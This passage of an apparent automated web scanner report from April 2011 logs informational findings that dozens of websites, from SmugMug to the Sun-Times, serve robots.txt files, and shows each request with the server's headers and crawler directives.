GET /robots.txt HTTP/1.0
Host: www.smugmug.com

Response

HTTP/1.0 200 OK
Server: Apache
X-S: 162.8:3709
X-Powered-By: SmugMug/0.9
X-SmugMug-Hiring: How to love what you do: http://www.smugmug.com/jobs/
X-SmugMug-Values: 2/4 - Love your employees
Cache-Control: private, no-store, no-cache, max-age=1, must-revalidate
Expires: Sat, 02 Apr 2011 13:37:21 GMT
ETag: "4ea613a63883228741a82864a76b4e83"
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:37:21 GMT
Content-Length: 3215
Connection: close

# If you're reading this, you belong at a job you love: http://www.smugmug.com/jobs/
# See http://www.smugmug.com/help/emailreal if you'd like to apply to be whitelisted for crawling this site

User-a
...[SNIP]...
24.758. http://www.snagajob.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snagajob.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snagajob.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:52:43 GMT
Accept-Ranges: bytes
ETag: "b330baa68ee2cb1:0"
Last-Modified: Mon, 14 Mar 2011 21:27:42 GMT
X-Powered-By: ASP.NET
Content-Length: 1094
Connection: close

# robots.txt for http://www.snagajob.com/ (JobSeeker)

User-agent: *
Disallow: /admin/
Disallow: /monitor/
Disallow: /gas/
Disallow: /gadgetspecs/
Disallow: /googlegadget/
Disallow: /affiliate
...[SNIP]...
24.759. http://www.snapfish.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snapfish.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:32 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=1209600
Expires: Sat Apr 16 06:40:32 PDT 2011
Pragma: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 6479
Connection: close
Set-Cookie: BIGipServersf3-scw-pod2=1208693258.16415.0000; path=/

User-agent: *
Disallow: /admin/
Disallow: /ygptemp/
Disallow: /modern_mom/
Disallow: /attwireless/
Disallow: /ivillage/
Disallow: /frommerscobrand/
Disallow: /aimtoday/
Disallow: /tickle/
Disallow: /m
...[SNIP]...
24.760. http://www.socialsecurity.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsecurity.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.socialsecurity.gov

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:43:57 GMT
Cache-control: public
Content-type: text/plain
Last-modified: Tue, 18 Aug 2009 14:19:27 GMT
Content-length: 775
Etag: "307-4a8ab86f"
Accept-ranges: bytes
Connection: close

# www.ssa.gov robots.txt
# 09/03/08
# Larry Montgomery
User-Agent: *
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /temp/
Disallow: /aian/
Disallow: /archives/
Disallow: /caosa/
Disallow:
...[SNIP]...
24.761. http://www.sodahead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sodahead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sodahead.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:41:40 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding

User-agent: *
Disallow: /css/
Disallow: /js/
Disallow: /images/
Disallow: /remote/
Disallow: /users/browse/
Sitemap: http://www.sodahead.com/sitemap.xml.gz
24.762. http://www.soft32.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft32.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soft32.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:20:01 GMT
Last-Modified: Mon, 07 Mar 2011 15:20:20 GMT
Server: nginx
X-commando: Bill
X-DNS-Prefetch-Control: off
Accept-Ranges: bytes
Cache-Control: private, max-age=86400
Age: 0
Expires: Sun, 03 Apr 2011 14:20:01 GMT
x-cdn: Served by Cotendo
Connection: close

Sitemap: http://www.soft32.com/sitemap.xml

User-agent: Mediapartners-Google*
Disallow:

User-agent: NPBot
Disallow: /

User-agent: grub-client
Disallow: /

User-agent: grub
Disallow: /

...[SNIP]...
24.763. http://www.soft82.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soft82.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 30 Nov 2008 20:39:48 GMT
ETag: "fd808c-12fb-4932fa14"
Accept-Ranges: bytes
Content-Length: 4859
Connection: close
Content-Type: text/plain

Sitemap: http://www.soft82.com/sitemap_index.xml

User-agent: Slurp
Disallow:

User-agent: Mediapartners-Google*
Disallow:

User-agent: MJ12bot
Disallow: /

User-agent: Webbot
Disallow: /

User-agent
...[SNIP]...
24.764. http://www.softonic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softonic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:36 GMT
Server: Apache
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=97e7c244f8b19ffde300ad8e6db80922; path=/; domain=softonic.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-control: max-age=0, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 132
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /google_ad.phtml
Disallow: /google_ads.phtml
Disallow: /google_ads/
Disallow: /startgate.gif
Disallow: /v/

24.765. http://www.softpedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softpedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softpedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:24 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 09:08:08 GMT
Accept-Ranges: bytes
Content-Length: 6519
Connection: close
Content-Type: text/plain

Sitemap: http://www.softpedia.com/sitemap_index.xml
Sitemap: http://www.softpedia.com/sitemap_es_index.xml
Sitemap: http://www.softpedia.com/sitemap_hubs.xml.gz

User-agent: Mediapartners-Google*
Dis
...[SNIP]...
24.766. http://www.songlyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songlyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.songlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 Feb 2009 02:14:15 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /openx/
Disallow: /flash/

User-agent: ia_archiver
Disallow: /
24.767. http://www.sony.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sony.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "12835f-358-f2bffc00"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 205
Date: Sat, 02 Apr 2011 13:50:45 GMT
Last-Modified: Wed, 10 Oct 2007 15:14:56 GMT
Content-Length: 856
Connection: close

# robots.txt for http://www.sony.com/

User-agent: *
Disallow: /500.shtml
Disallow: /401.shtml
Disallow: /403.shtml
Disallow: /401.shtml
Disallow: /online.shtml
Disallow: /SCA/info/
Disallow:
...[SNIP]...
24.768. http://www.southwest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southwest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.southwest.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:25 GMT
Server: Apache
Accept-Ranges: bytes
X-Swa-ws: BADIS
Content-Length: 88
Connection: close
Content-Type: text/plain

# No robots allowed in CGI
User-agent: *
Disallow: /cgi-bin/
Disallow: /testimonials/
24.769. http://www.spanishdict.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spanishdict.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Last-Modified: Thu, 20 Aug 2009 23:04:46 GMT
ETag: "30-4719ac7183f80"
Accept-Ranges: bytes
Content-Length: 48
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /m/translate/
Allow: /
24.770. http://www.sparkpeople.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sparkpeople.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sparkpeople.com

Response

HTTP/1.1 200 OK
Content-Length: 436
Content-Type: text/plain
Last-Modified: Tue, 11 Jan 2011 19:32:33 GMT
Accept-Ranges: bytes
ETag: "2e6b2b4bc6b1cb1:1329"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:42 GMT
Connection: close

http://www.sparkpeople.com/sp_sitemap.xml.gz # Added by Google Sitemap Generator

User-agent: *
Disallow: /myspark/nutrition.asp
Disallow: /myspark/fitness2.asp
Disallow: /myspark/other_goals.asp
...[SNIP]...
24.771. http://www.spellingcity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spellingcity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spellingcity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Sat, 02 Apr 2011 13:43:11 GMT
Content-Type: text/plain
Content-Length: 418
Last-Modified: Wed, 26 Jan 2011 17:40:38 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
24.772. http://www.spike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 161
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:40 GMT; path=/
Vary: User-Agent

User-agent: *
Disallow: /fragments/
Disallow: /search/
Disallow: /tag/
Disallow: /*_df
Disallow: /*return%20false
Sitemap: http://www.spike.com/sitemap_index.xml
24.773. http://www.spokeo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spokeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spokeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:29 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 21:42:53 GMT
ETag: "7fa8ba-15f-49ce5dcd17140"
Accept-Ranges: bytes
Content-Length: 351
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /privacy
Disallow: /email-search/search
Disallow: /email/search
Disallow: /username-search/search
Disallow: /username/search
Disallow: /name/search
Disallow: /name-search/searc
...[SNIP]...
24.774. http://www.sportsauthority.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsauthority.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsauthority.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 11 May 2010 08:45:05 GMT
ETag: "4dc7e9-1be-4864d8abba640"
Accept-Ranges: bytes
Content-Length: 446
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:07:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /cart/
Disallow: /checkout/
Disallow: /cartHandler/
Disallow: /ControllerServlet/
Disallow: /emailHandler/
Disallow: /graphics/
Disallow: /include/
D
...[SNIP]...
24.775. http://www.sportsmansguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsmansguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsmansguide.com

Response

HTTP/1.1 200 OK
Content-Length: 166
Content-Type: text/plain
Last-Modified: Thu, 07 Oct 2010 19:15:47 GMT
Accept-Ranges: bytes
ETag: "7e434fc5466cb1:d75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:32 GMT
Connection: close

# Do not spider the admin directory
User-agent: *
Disallow: /admin/
Disallow: /net/catalog/

# Stress Tool is not allowed
User-agent: Stress-agent
Disallow: /
24.776. http://www.sportsnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 11 Mar 2011 20:17:01 GMT
ETag: "db68344829e0cb1:15ed"
Content-Length: 58

# robots.txt
User-agent: *
Disallow:
Crawl-delay: 60
24.777. http://www.springerlink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.springerlink.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 605
Accept-Ranges: bytes
Cache-Control: public, max-age=1209600
Expires: Sat, 16 Apr 2011 13:45:03 GMT
Last-Modified: Tue, 15 Mar 2011 16:27:15 GMT
ETag: Tue, 15 Mar 2011 11:27:15 GMT
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Allow: /architecture-and-design/$
Allow: /behavioral-science/$
Allow: /biomedical-and-life-sciences/$
Allow: /business-and-eco
...[SNIP]...
24.778. http://www.sprint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:27:07 GMT
Content-length: 127
Content-type: text/plain
Last-modified: Tue, 29 Jun 2010 17:26:58 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html
24.779. http://www.squidoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.squidoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.squidoo.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 11 Jun 2010 22:15:55 GMT
ETag: "5ca0b6d-1e7-488c87b945cc0"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 487
Date: Sat, 02 Apr 2011 12:44:00 GMT
X-Varnish: 1710142489 1709711074
Age: 6157
Via: 1.1 varnish
Connection: close

#
# Squidoo Robots exclusion file
# See http://www.robotstxt.org/wc/faq.html for more information
#

User-agent: Mediapartners-Google
Disallow:

User-Agent: Lijit Crawler
Disallow:

User-agent: *
Dis
...[SNIP]...
24.780. http://www.ssa.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ssa.gov

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:34:30 GMT
Cache-control: public
Content-type: text/plain
Last-modified: Tue, 18 Aug 2009 14:19:27 GMT
Content-length: 775
Etag: "307-4a8ab86f"
Accept-ranges: bytes
Connection: close

# www.ssa.gov robots.txt
# 09/03/08
# Larry Montgomery
User-Agent: *
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /temp/
Disallow: /aian/
Disallow: /archives/
Disallow: /caosa/
Disallow:
...[SNIP]...
24.781. http://www.stanford.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stanford.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stanford.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:05 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 23:32:15 GMT
ETag: "16ea0b-4f-49ea1f473ddc0"
Accept-Ranges: bytes
Content-Length: 79
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /~folutade/ATI/
Disallow: /dept/soc/people/rsandefur/

24.782. http://www.star-telegram.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.star-telegram.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.star-telegram.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Fri, 21 Jan 2011 16:41:32 GMT
ETag: "f754a6-ab9-4d39b73c"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:56 GMT
Content-Length: 2745
Connection: close

# robots updated: 2008/06/04 - pbuckley@mi
# robots updated: 2008/05/23 - chilton
# robots updated: 2008/11/18 - kvetter

# Made changes to old RTF - created 2008/10/02: User-agent: * Disallow: /
...[SNIP]...
24.783. http://www.starpulse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starpulse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.starpulse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:06 GMT
Server: Apache/2.2.15 (FreeBSD) PHP/5.3.2
Last-Modified: Thu, 10 Mar 2011 15:40:35 GMT
ETag: "9a36a9-d4-49e22aa97e2c0"
Accept-Ranges: bytes
Content-Length: 212
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Slurp
Crawl-delay: 5
Disallow: /forum/
Disallow: /members/
Disallow: /sp_comments/

User-agent: *
Disallow: /forum/
Disallow: /members/profile.html
Disallow: /sp_comments/
Disallow: /objec
...[SNIP]...
24.784. http://www.startribune.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.startribune.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 13:50:50 GMT
X-Server-Name: dv-c1-r1-u7-b7
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:37:30 GMT
Content-Length: 55
Connection: close

User-agent: *
Disallow:/search
Disallow:/searchresults
24.785. http://www.state.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.gov

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "ed2c2598845076d83690ba59b058e231:1301741921"
Last-Modified: Sat, 02 Apr 2011 10:58:41 GMT
Accept-Ranges: bytes
Content-Length: 159
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:38:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:07 GMT
Connection: close

# tell scanning search robots not to index the older archive pages
#
User-agent: *
Disallow: /www/
Disallow: /waterfall/
Disallow: /menu/
Disallow: /navitest/
24.786. http://www.state.tn.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.tn.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.tn.us

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache
Last-Modified: Tue, 27 Jan 1998 21:48:00 GMT
ETag: "c51f7-16-70b5a400"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-Agent:
Disallow:
24.787. http://www.statefarm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.statefarm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.statefarm.com

Response

HTTP/1.1 200 OK
Content-Length: 347
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2011 20:52:54 GMT
Accept-Ranges: bytes
ETag: "0d7721dd3e8cb1:93e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:50:08 GMT
Connection: close

User-Agent: *

Crawl-delay: 5

# Disallow
Disallow: /errors/
Disallow: /apps/email/ContactAgent/ContactAgent.asp

# Sitemaps
Sitemap: http://www.statefarm.com/sitemap.xml
Sitemap: http://www
...[SNIP]...
24.788. http://www.stateuniversity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stateuniversity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stateuniversity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 14:13:46 GMT
Content-Type: text/plain
Content-Length: 60
Last-Modified: Tue, 29 Mar 2011 15:30:02 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /resources
Disallow: /comparison/add
24.789. http://www.steadyhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.steadyhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.steadyhealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:29 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 14:13:12 GMT
ETag: "2bda472-20f-48d649de32e00"
Accept-Ranges: bytes
Content-Length: 527
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:33:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /faq.php
Disallow: /login.php
Disallow: /posting.php
Disallow: /profile.php
Disallow: /search.php
Disallow: /vote.php
Disallow: /software/vitamin_test/*
Disallow: /wishlist/*
D
...[SNIP]...
24.790. http://www.stltoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stltoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stltoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2013520
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 02 Apr 2011 13:28:50 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.7
X-TNCMS-Render-Time: 0.0241
X-PHP-Engine: enabled
Real-Hostname: stltoday.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 118
Connection: close
X-Cache-Info: cached

User-agent: *
Disallow: /json
Disallow: /test
Disallow: /template

Sitemap: http://www.stltoday.com/sitemap.xml
24.791. http://www.stlyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Last-Modified: Sun, 13 Sep 2009 05:00:00 GMT
ETag: "4e3f4-23-6bdbb400"
Accept-Ranges: bytes
Content-Length: 35
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cgi-bin
24.792. http://www.stumbleupon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:51 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Sat, 02 Apr 2011 12:38:09 GMT
X-Varnish: 554478042 554410793
Age: 112
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...
24.793. http://www.stylelist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stylelist.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 187
Keep-Alive: timeout=5, max=999982
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /tag/expire-images*
Disallow: /_uac/adpage.html
Sitemap: http://www.stylelist.com/sitemap_index.xml
24.794. http://www.suite101.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suite101.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:44 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Set-Cookie: CFID=446052314;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Set-Cookie: CFTOKEN=74376314;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Set-Cookie: SUITE101_TRACKING=DE67A0D4%2D06DC%2DE3A2%2D904E049416791826;domain=.suite101.com;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Pragma: no-cache
cache-control: no-cache
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a625a:0; expires=Sat, 02-Apr-11 13:01:40 GMT; path=/

User-agent: *

Disallow: /admin/
Disallow: /cfide/
Disallow: /section/content_admin/
Disallow: /course/admin/
Disallow: /course/developer/
Disallow: /suiteu/admin/
Disallow: /functions/
Disallow: /tr
...[SNIP]...
24.795. http://www.suntimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suntimes.com

Response

HTTP/1.1 200 OK
